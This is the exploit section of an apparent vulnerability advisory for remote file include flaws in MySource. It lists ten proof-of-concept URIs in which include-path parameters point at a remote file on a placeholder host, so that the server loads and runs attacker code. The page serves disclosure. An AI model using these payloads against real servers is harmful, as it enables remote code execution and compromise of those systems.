• info
• discussion
• exploit
• solution
• references

MySource Multiple Remote File Include Vulnerabilities

No exploit is required.

The following proof of concept URI is available:

http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://www.example.com/[file]?
http://www.example.com/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://www.example.com/[file]?
http://www.example.com/web/init_mysource.php?INCLUDE_PATH=http://www.example.com/[file]?
http://www.example.com/pear/Net_Socket/Socket.php?PEAR_PATH=http://www.example.com/[file]?
http://www.example.com/pear/HTTP_Request/Request.php?PEAR_PATH=http://www.example.com/[file]?
http://www.example.com/pear/Mail/Mail.php?PEAR_PATH=http://www.example.com/[file]?
http://www.example.com/pear/Date/Date.php?PEAR_PATH=http://www.example.com/[file]?
http://www.example.com/pear/Date/Date/Span.php?PEAR_PATH=http://www.example.com/[file]?
http://www.example.com/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://www.example.com/[file]?
http://www.example.com/pear/Mail_Mime/mime.php?PEAR_PATH=http://www.example.com/[file]?